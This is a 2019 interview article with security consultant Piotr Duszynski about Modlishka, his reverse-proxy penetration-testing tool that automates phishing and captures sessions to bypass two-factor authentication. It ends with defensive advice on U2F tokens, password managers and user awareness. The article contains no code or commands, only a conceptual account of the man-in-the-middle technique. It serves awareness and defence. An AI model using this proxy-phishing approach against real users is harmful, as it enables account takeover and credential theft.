Is Two-Factor Authentication as we Know it Dead?

4th of April 2019

- challenging traditional 2FA with Modlishka

Interview with Piotr Duszynski, by Frederikke Knop

While most users consider two-factor authentication (2FA) the best security measure to stop attackers from breaking into your account, it does have weaknesses that can be exploited in phishing attacks. 

An article published by Amnesty International in December 2018 showed how weaknesses in common forms of two-factor authentication are being exploited by attackers around the world. A month later, FortConsult’s managing security consultant Piotr Duszynski was swiftly bypassing 2FA with the help of his shiny new tool.

Meet “Modlishka”, Piotr’s own pentesting tool that automates phishing attacks and seamlessly bypasses 2FA in the matter of seconds.

Introducing Modlishka

Me: “Hi Piotr; tell us about Modlishka.” 

Piotr: “Modlishka is a tool I developed for penetration testing purposes that can bypass 2FA and help automate phishing attacks. It works by sending targeted users a link that looks like a legitimate and trusted site like Gmail or Hotmail, but instead, the link goes through a web proxy, which always serves users with the latest version of the proxied site. You should be trained in knowing what the difference is, to spot it”. 

Reverse proxies have been around for more than 10 years”, Piotr explains, “there’s nothing new about them”. It is the way that Modlishka optimises handling the traffic that makes it special: 

Modlishka utilises a reverse proxy. It intercepts all the traffic from the user’s browser, inspects it, modifies it, and then forwards it to the target website. It’s based on a well-known attack scheme called man-in-the-middle and is pretty much transparent and automated in a way that supports all websites based on HTTP, which is super useful for ethical penetration testers.” 

Moreover, Modlishka keeps a copy of the authenticated session, enabling the attacker to access the users’ credentials in the future.

Spot the difference when logging into Gmail:

Gmail login

...and the Modlishka version here: 

Modlishka Google login

Improving industry knowledge

Initially, Piotr developed the tool for professional use in his job as a security consultant performing penetration tests for clients. To make progress in the industry, however, Piotr published the code for Modlishka to point to the obvious areas for improvement within the cyber security industry, and to contribute to making simulation attacks up-to-date with real life attacks, “Traditional two-factor authentication is no longer adequate to the credential-type of threats that have been spotted on the Internet throughout the past year. We need to be capable of preventing these types of attacks in the industry in order to maintain a strong security level” says Piotr and continues: “Now we can see where our current security measures are failing and how we can improve it.

Being able to automate phishing attacks with Modlishka in this manner emphasises the fact that the IT industry needs to invest in better solutions and more resilient designs, and take all factors into account when working with cyber security. And, according to Piotr, the impact Modlishka has made is tangible: “I get a lot of positive feedback from security consultants, who tell me that this tool has helped them get the attention of their board of directors and helped them emphasise the importance of investing in anti-phishing security defences such as employee awareness. I’m really happy about that.” says Piotr.

How to beat a tool like Modlishka

So, how can you stop a man-in-the-middle attack like Modlishka? Well, it’s difficult - at least from a technical point of view, says Piotr: “Defending against a reverse proxy is tricky. In fact, only U2F-based tokens are immune to such attacks at the moment.” You can use authentication based on a U2F like FIDO or FIDO2, which require physical access to the token.

Where the real issue lies, however, is how organisations deal with risks associated with social engineering: “User awareness and ensuring that your employees are up-to-date with modern social engineering, and the right technical security measures, such as FIDO2 tokens should be your move towards defending yourself against man-in-the-middle attacks.” recommends Piotr.

Piotr’s three steps to defending yourself against credential-focused attacks:

  • use U2F hardware tokens as your second authentication factor
  • use password managers – they ensure that the domain name in your browser is correct before pasting in the password
  • constantly raise user and employee awareness about current social engineering techniques
2FA is not dead, but...

So, is 2FA really dead? No, two-factor authentication is still the best thing around when it comes to adding another layer in keeping your credentials safe. But it is not a silver bullet. Modlishka is living proof that traditional 2FA can be bypassed fairly easily if you have the right technical skill level.

What is dead, is 2FA as we know it, as the standard stand-alone protection. Continuous user awareness about modern phishing techniques and a move towards a new standard for universal two-factor authentication like U2F that uses USB or NFC devices, is the best defence against fighting tomorrow’s malicious campaigns.

Watch Piotr Duszynski’s Modlishka demo here.

Read more about social engineering here or contact us if you have any questions.